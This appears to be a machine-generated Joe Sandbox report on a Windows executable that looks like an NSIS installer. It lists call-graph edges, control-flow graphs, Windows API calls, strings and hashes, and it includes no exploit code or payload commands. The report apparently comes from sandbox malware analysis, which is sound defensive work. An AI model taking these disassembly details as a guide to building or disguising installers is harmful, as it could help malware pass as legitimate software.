4092->4091 4094 406816 GetFileAttributesW 4093->4094 4094->4095 4095->3928 4097 406035 lstrcpynW 4095->4097 4096->4089 4097->3961 4098->3966 4099->3950 4100->3958 4101->3977 4103 405ca6 4102->4103 4104 405c9a CloseHandle 4102->4104 4103->3977 4104->4103 4105->3992 4106->3994 4108 40678c 4107->4108 4109 406792 CharPrevW 4108->4109 4110 40361f 4108->4110 4109->4108 4109->4110 4111 406035 lstrcpynW 4110->4111 4111->3998 4113 4032f3 4112->4113 4114 4032db 4112->4114 4117 403303 GetTickCount 4113->4117 4118 4032fb 4113->4118 4115 4032e4 DestroyWindow 4114->4115 4116 4032eb 4114->4116 4115->4116 4116->4001 4120 403311 CreateDialogParamW ShowWindow 4117->4120 4121 403334 4117->4121 4125 40635e 4118->4125 4120->4121 4121->4001 4123->4007 4124->4008 4126 40637b PeekMessageW 4125->4126 4127 406371 DispatchMessageW 4126->4127 4128 403301 4126->4128 4127->4126 4128->4001 4130 403ed5 4129->4130 4145 405f7d wsprintfW 4130->4145 4132 403f49 4133 406831 18 API calls 4132->4133 4134 403f55 SetWindowTextW 4133->4134 4135 403f70 4134->4135 4136 403f8b 4135->4136 4137 406831 18 API calls 4135->4137 4136->4031 4137->4135 4138->4027 4139->4033 4146 406035 lstrcpynW 4140->4146 4142 403eb4 4143 40674e 3 API calls 4142->4143 4144 403eba lstrcatW 4143->4144 4144->4053 4145->4132 4146->4142 4148 403cbd 4147->4148 4149 4038a2 4148->4149 4150 403cc2 FreeLibrary GlobalFree 4148->4150 4151 406cc7 4149->4151 4150->4149 4150->4150 4152 4067aa 18 API calls 4151->4152 4153 406cda 4152->4153 4154 406ce3 DeleteFileW 4153->4154 4155 406cfa 4153->4155 4194 4038ae CoUninitialize 4154->4194 4156 406e77 4155->4156 4198 406035 lstrcpynW 4155->4198 4162 406301 2 API calls 4156->4162 4182 406e84 4156->4182 4156->4194 4158 406d25 4159 406d39 4158->4159 4160 406d2f lstrcatW 4158->4160 4163 40677d 2 API calls 4159->4163 4161 406d3f 4160->4161 4165 406d4f lstrcatW 4161->4165 4167 406d57 lstrlenW FindFirstFileW 4161->4167 4164 406e90 4162->4164 4163->4161 4168 40674e 3 API calls 4164->4168 4164->4194 4165->4167 4166 4062cf 11 API calls 4166->4194 4171 406e67 4167->4171 4195 406d7e 4167->4195 4169 406e9a 4168->4169 4172 4062cf 11 API calls 4169->4172 4170 405d32 CharNextW 4170->4195 4171->4156 4173 406ea5 4172->4173 4174 405e5c 2 API calls 4173->4174 4175 406ead RemoveDirectoryW 4174->4175 4179 406ef0 4175->4179 4180 406eb9 4175->4180 4176 406e44 FindNextFileW 4178 406e5c FindClose 4176->4178 4176->4195 4178->4171 4181 404f9e 25 API calls 4179->4181 4180->4182 4183 406ebf 4180->4183 4181->4194 4182->4166 4185 4062cf 11 API calls 4183->4185 4184 4062cf 11 API calls 4184->4195 4186 406ec9 4185->4186 4189 404f9e 25 API calls 4186->4189 4187 406cc7 72 API calls 4187->4195 4188 405e5c 2 API calls 4190 406dfa DeleteFileW 4188->4190 4191 406ed3 4189->4191 4190->4195 4192 406c94 42 API calls 4191->4192 4192->4194 4193 404f9e 25 API calls 4193->4176 4194->3936 4194->3937 4195->4170 4195->4176 4195->4184 4195->4187 4195->4188 4195->4193 4196 404f9e 25 API calls 4195->4196 4197 406c94 42 API calls 4195->4197 4199 406035 lstrcpynW 4195->4199 4196->4195 4197->4195 4198->4158 4199->4195 4200->4085 4956 401cb2 4957 40145c 18 API calls 4956->4957 4958 401c54 4957->4958 4959 4062cf 11 API calls 4958->4959 4960 401c64 4958->4960 4961 401c59 4959->4961 4962 406cc7 81 API calls 4961->4962 4962->4960 3706 4021b5 3707 40145c 18 API calls 3706->3707 3708 4021bb 3707->3708 3709 40145c 18 API calls 3708->3709 3710 4021c4 3709->3710 3711 40145c 18 API calls 3710->3711 3712 4021cd 3711->3712 3713 40145c 18 API calls 3712->3713 3714 4021d6 3713->3714 3715 404f9e 25 API calls 3714->3715 3716 4021e2 ShellExecuteW 3715->3716 3717 40221b 3716->3717 3718 40220d 3716->3718 3719 4062cf 11 API calls 3717->3719 3720 4062cf 11 API calls 3718->3720 3721 402230 3719->3721 3720->3717 4963 402238 4964 40145c 18 API calls 4963->4964 4965 40223e 4964->4965 4966 4062cf 11 API calls 4965->4966 4967 40224b 4966->4967 4968 404f9e 25 API calls 4967->4968 4969 402255 4968->4969 4970 405c6b 2 API calls 4969->4970 4971 40225b 4970->4971 4972 4062cf 11 API calls 4971->4972 4980 4022ac CloseHandle 4971->4980 4977 40226d 4972->4977 4974 4030e3 4975 402283 WaitForSingleObject 4976 402291 GetExitCodeProcess 4975->4976 4975->4977 4979 4022a3 4976->4979 4976->4980 4977->4975 4978 40635e 2 API calls 4977->4978 4977->4980 4978->4975 4982 405f7d wsprintfW 4979->4982 4980->4974 4982->4980 3782 401eb9 3783 401f24 3782->3783 3786 401ec6 3782->3786 3784 401f53 GlobalAlloc 3783->3784 3788 401f28 3783->3788 3790 406831 18 API calls 3784->3790 3785 401ed5 3789 4062cf 11 API calls 3785->3789 3786->3785 3792 401ef7 3786->3792 3787 401f36 3806 406035 lstrcpynW 3787->3806 3788->3787 3791 4062cf 11 API calls 3788->3791 3801 401ee2 3789->3801 3794 401f46 3790->3794 3791->3787 3804 406035 lstrcpynW 3792->3804 3796 402708 3794->3796 3797 402387 GlobalFree 3794->3797 3797->3796 3798 401f06 3805 406035 lstrcpynW 3798->3805 3799 406831 18 API calls 3799->3801 3801->3796 3801->3799 3802 401f15 3807 406035 lstrcpynW 3802->3807 3804->3798 3805->3802 3806->3794 3807->3796 4983 404039 4984 404096 4983->4984 4985 404046 lstrcpynA lstrlenA 4983->4985 4985->4984 4986 404077 4985->4986 4986->4984 4987 404083 GlobalFree 4986->4987 4987->4984

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 0 4050f9-405114 1 4052c1-4052c8 0->1 2 40511a-405201 GetDlgItem * 3 call 403dc4 call 4044a2 call 406831 call 4062cf GetClientRect GetSystemMetrics SendMessageW * 2 0->2 3 4052f2-4052ff 1->3 4 4052ca-4052ec GetDlgItem CreateThread CloseHandle 1->4 35 405203-40521d SendMessageW * 2 2->35 36 40521f-405222 2->36 6 405320-405327 3->6 7 405301-40530a 3->7 4->3 11 405329-40532f 6->11 12 40537e-405382 6->12 9 405342-40534b call 403df6 7->9 10 40530c-40531b ShowWindow * 2 call 403dc4 7->10 22 405350-405354 9->22 10->6 16 405331-40533d call 403d44 11->16 17 405357-405367 ShowWindow 11->17 12->9 14 405384-405387 12->14 14->9 20 405389-40539c SendMessageW 14->20 16->9 23 405377-405379 call 403d44 17->23 24 405369-405372 call 404f9e 17->24 29 4053a2-4053c3 CreatePopupMenu call 406831 AppendMenuW 20->29 30 4052ba-4052bc 20->30 23->12 24->23 37 4053c5-4053d6 GetWindowRect 29->37 38 4053d8-4053de 29->38 30->22 35->36 39 405232-405249 call 403d6b 36->39 40 405224-405230 SendMessageW 36->40 41 4053df-4053f7 TrackPopupMenu 37->41 38->41 46 40524b-40525f ShowWindow 39->46 47 40527f-4052a0 GetDlgItem SendMessageW 39->47 40->39 41->30 43 4053fd-405414 41->43 45 405419-405434 SendMessageW 43->45 45->45 48 405436-405459 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 45->48 49 405261-40526c ShowWindow 46->49 50 40526e 46->50 47->30 51 4052a2-4052b8 SendMessageW * 2 47->51 52 40545b-405484 SendMessageW 48->52 54 405274-40527a call 403dc4 49->54 50->54 51->30 52->52 53 405486-4054a0 GlobalUnlock SetClipboardData CloseClipboard 52->53 53->30 54->47
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,00000403), ref: 0040515B
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EE), ref: 0040516A
                                                                                                                                                                                                                                                                                            • GetClientRect.USER32(?,?), ref: 004051C2
                                                                                                                                                                                                                                                                                            • GetSystemMetrics.USER32(00000015), ref: 004051CA
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001061,00000000,00000002), ref: 004051EB
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004051FC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 0040520F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 0040521D
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405230
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 00405252
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405266
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 00405287
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405297
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004052AC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004052B8
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003F8), ref: 00405179
                                                                                                                                                                                                                                                                                              • Part of subcall function 00403DC4: SendMessageW.USER32(00000028,?,00000001,004057E0), ref: 00403DD2
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406831: GetVersion.KERNEL32(00445D80,?,00000000,00404FD5,00445D80,00000000,00424579,74DF23A0,00000000), ref: 00406902
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406EA5,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062DC
                                                                                                                                                                                                                                                                                              • Part of subcall function 004062CF: wvsprintfW.USER32(00000000,?,?), ref: 004062F3
                                                                                                                                                                                                                                                                                            • GetDlgItem.USER32(?,000003EC), ref: 004052D7
                                                                                                                                                                                                                                                                                            • CreateThread.KERNELBASE(00000000,00000000,Function_00005073,00000000), ref: 004052E5
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNELBASE(00000000), ref: 004052EC
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000000), ref: 00405313
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(?,00000008), ref: 00405318
                                                                                                                                                                                                                                                                                            • ShowWindow.USER32(00000008), ref: 0040535F
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405391
                                                                                                                                                                                                                                                                                            • CreatePopupMenu.USER32 ref: 004053A2
                                                                                                                                                                                                                                                                                            • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004053B7
                                                                                                                                                                                                                                                                                            • GetWindowRect.USER32(?,?), ref: 004053CA
                                                                                                                                                                                                                                                                                            • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004053EC
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405427
                                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00000000), ref: 00405437
                                                                                                                                                                                                                                                                                            • EmptyClipboard.USER32 ref: 0040543D
                                                                                                                                                                                                                                                                                            • GlobalAlloc.KERNEL32(00000042,00000000,?,?,00000000,?,00000000), ref: 00405449
                                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00405453
                                                                                                                                                                                                                                                                                            • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405467
                                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00405489
                                                                                                                                                                                                                                                                                            • SetClipboardData.USER32(0000000D,00000000), ref: 00405494
                                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 0040549A
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlockVersionlstrlenwvsprintf
                                                                                                                                                                                                                                                                                            • String ID: New install of "%s" to "%s"${
                                                                                                                                                                                                                                                                                            • API String ID: 2110491804-1641061399
                                                                                                                                                                                                                                                                                            • Opcode ID: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                            • Instruction ID: db3ff0878cedf1d1b3e6f9985675ba3e3c8e3ad145c0decdf5c07b0ce3ef5d1a
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 27dd6abe78b25364254968db719b86f88dfe8c12dd5559a56974b496927f2e5b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46B15970900609BFEB11AFA1DD89EAE7B79FB04354F00803AFA05BA1A1C7755E81DF58

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
                                                                                                                                                                                                                                                                                            control_flow_graph 202 4038af-403945 #17 SetErrorMode OleInitialize call 406328 SHGetFileInfoW call 406035 GetCommandLineW call 406035 GetModuleHandleW 209 403947-40394a 202->209 210 40394f-403963 call 405d32 CharNextW 202->210 209->210 213 4039f6-4039fc 210->213 214 403a02 213->214 215 403968-40396e 213->215 216 403a21-403a39 GetTempPathW call 4037f8 214->216 217 403970-403976 215->217 218 403978-40397c 215->218 228 403a3b-403a59 GetWindowsDirectoryW lstrcatW call 4037f8 216->228 229 403a5f-403a79 DeleteFileW call 4035b3 216->229 217->217 217->218 219 403984-403988 218->219 220 40397e-403983 218->220 222 4039e4-4039f1 call 405d32 219->222 223 40398a-403991 219->223 220->219 222->213 237 4039f3 222->237 226 403993-40399a 223->226 227 4039a6-4039b8 call 40382c 223->227 232 4039a1 226->232 233 40399c-40399f 226->233 242 4039ba-4039c1 227->242 243 4039cd-4039e2 call 40382c 227->243 228->229 240 403af8-403b07 call 403885 CoUninitialize 228->240 229->240 241 403a7b-403a81 229->241 232->227 233->227 233->232 237->213 257 403bfa-403c00 240->257 258 403b0d-403b1d call 405ccc ExitProcess 240->258 244 403ae1-403ae8 call 405958 241->244 245 403a83-403a8c call 405d32 241->245 247 4039c3-4039c6 242->247 248 4039c8 242->248 243->222 254 403a04-403a1c call 40824c call 406035 243->254 256 403aed-403af3 call 406113 244->256 260 403aa5-403aa7 245->260 247->243 247->248 248->243 254->216 256->240 262 403c02-403c1f call 406328 * 3 257->262 263 403c7d-403c85 257->263 267 403aa9-403ab3 260->267 268 403a8e-403aa0 call 40382c 260->268 293 403c21-403c23 262->293 294 403c69-403c74 ExitWindowsEx 262->294 269 403c87 263->269 270 403c8b 263->270 275 403b23-403b3d lstrcatW lstrcmpiW 267->275 276 403ab5-403ac5 call 4067aa 267->276 268->267 283 403aa2 268->283 269->270 275->240 277 403b3f-403b55 CreateDirectoryW SetCurrentDirectoryW 275->277 276->240 286 403ac7-403add call 406035 * 2 276->286 281 403b62-403b82 call 406035 * 2 277->281 282 403b57-403b5d call 406035 277->282 303 403b87-403ba3 call 406831 DeleteFileW 281->303 282->281 283->260 286->244 293->294 297 403c25-403c27 293->297 294->263 300 403c76-403c78 call 40141d 294->300 297->294 301 403c29-403c3b GetCurrentProcess 297->301 300->263 301->294 308 403c3d-403c5f 301->308 309 403be4-403bec 303->309 310 403ba5-403bb5 CopyFileW 303->310 308->294 309->303 311 403bee-403bf5 call 406c94 309->311 310->309 312 403bb7-403bd7 call 406c94 call 406831 call 405c6b 310->312 311->240 312->309 322 403bd9-403be0 CloseHandle 312->322 322->309
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • #17.COMCTL32 ref: 004038CE
                                                                                                                                                                                                                                                                                            • SetErrorMode.KERNELBASE(00008001), ref: 004038D9
                                                                                                                                                                                                                                                                                            • OleInitialize.OLE32(00000000), ref: 004038E0
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406328: GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            • SHGetFileInfoW.SHELL32(0040A264,00000000,?,000002B4,00000000), ref: 00403908
                                                                                                                                                                                                                                                                                              • Part of subcall function 00406035: lstrcpynW.KERNEL32(?,?,00002004,0040391D,00476AA0,NSIS Error), ref: 00406042
                                                                                                                                                                                                                                                                                            • GetCommandLineW.KERNEL32(00476AA0,NSIS Error), ref: 0040391D
                                                                                                                                                                                                                                                                                            • GetModuleHandleW.KERNEL32(00000000,004CF0A0,00000000), ref: 00403930
                                                                                                                                                                                                                                                                                            • CharNextW.USER32(00000000,004CF0A0,00000020), ref: 00403957
                                                                                                                                                                                                                                                                                            • GetTempPathW.KERNEL32(00002004,004E30C8,00000000,00000020), ref: 00403A2C
                                                                                                                                                                                                                                                                                            • GetWindowsDirectoryW.KERNEL32(004E30C8,00001FFF), ref: 00403A41
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,\Temp), ref: 00403A4D
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNELBASE(004DF0C0), ref: 00403A64
                                                                                                                                                                                                                                                                                            • CoUninitialize.COMBASE(?), ref: 00403AFD
                                                                                                                                                                                                                                                                                            • ExitProcess.KERNEL32 ref: 00403B1D
                                                                                                                                                                                                                                                                                            • lstrcatW.KERNEL32(004E30C8,~nsu.tmp), ref: 00403B29
                                                                                                                                                                                                                                                                                            • lstrcmpiW.KERNEL32(004E30C8,004DB0B8,004E30C8,~nsu.tmp), ref: 00403B35
                                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(004E30C8,00000000), ref: 00403B41
                                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(004E30C8), ref: 00403B48
                                                                                                                                                                                                                                                                                            • DeleteFileW.KERNEL32(0043DD40,0043DD40,?,00483008,0040A204,0047F000,?), ref: 00403B99
                                                                                                                                                                                                                                                                                            • CopyFileW.KERNEL32(004EB0D8,0043DD40,00000001), ref: 00403BAD
                                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,0043DD40,0043DD40,?,0043DD40,00000000), ref: 00403BDA
                                                                                                                                                                                                                                                                                            • GetCurrentProcess.KERNEL32(00000028,00000005,00000005,00000004,00000003), ref: 00403C30
                                                                                                                                                                                                                                                                                            • ExitWindowsEx.USER32(00000002,00000000), ref: 00403C6C
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: File$DirectoryHandle$CurrentDeleteExitModuleProcessWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                                                                                                                                                                                                                                                                                            • String ID: /D=$ _?=$Error launching installer$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$~nsu.tmp
                                                                                                                                                                                                                                                                                            • API String ID: 2435955865-3712954417
                                                                                                                                                                                                                                                                                            • Opcode ID: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                            • Instruction ID: 6e3717b9be2730fff72f59090edb21b77de3e5055cb75e9aafb2752c1f1d7b94
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: aec89c4631a4f28101b36bf3f0ee1ca0be396cf3d13a1cbdd2f96bcbf360b5e4
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 1DA1E6715443117AD720BF629C4AE1B7EACAB0470AF10443FF545B62D2D7BD8A448BAE
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNELBASE(00461E18,00466A20,00461E18,004067FA,00461E18), ref: 0040630C
                                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00406318
                                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                            • String ID: jF
                                                                                                                                                                                                                                                                                            • API String ID: 2295610775-3349280890
                                                                                                                                                                                                                                                                                            • Opcode ID: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                            • Instruction ID: ae54cbf5f70e9060ab25dbcc7d0ddb8e13a77f3b50f8061b144b06f1ffcf0783
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: a5aa16d55819016c4e26a60e9ec5dfcaedf525e35b4e30500cf5e78c71265be2
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C8D01231A141215BD7105778AD0C89B7E9CDF0A330366CA32F866F11F5D3348C2186ED
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetModuleHandleA.KERNEL32(?,?,00000020,004038F2,00000008), ref: 00406336
                                                                                                                                                                                                                                                                                            • LoadLibraryA.KERNELBASE(?,?,?,00000020,004038F2,00000008), ref: 00406341
                                                                                                                                                                                                                                                                                            • GetProcAddress.KERNEL32(00000000), ref: 00406353
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1692748467.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692728633.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692777079.0000000000409000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000420000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692795954.000000000046B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1692916425.0000000000500000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_lem.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AddressHandleLibraryLoadModuleProc
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 310444273-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                            • Instruction ID: 7c6873576e710d3586a353c563cf751ff2fc1cfd2ce2d1275f1b712779c4e249
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 2fa3fc2bddc204e922c82fa426c5bb1cc5fbaa7aed8e5e7daaeaf6592e3c6ac6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A8D01232200111D7C7005FA5AD48A5FB77DAE95A11706843AF902F3171E734D911E6EC

                                                                                                                                                                                                                                                                                            Control-flow Graph

                                                                                                                                                                                                                                                                                            • Executed
                                                                                                                                                                                                                                                                                            • Not Executed
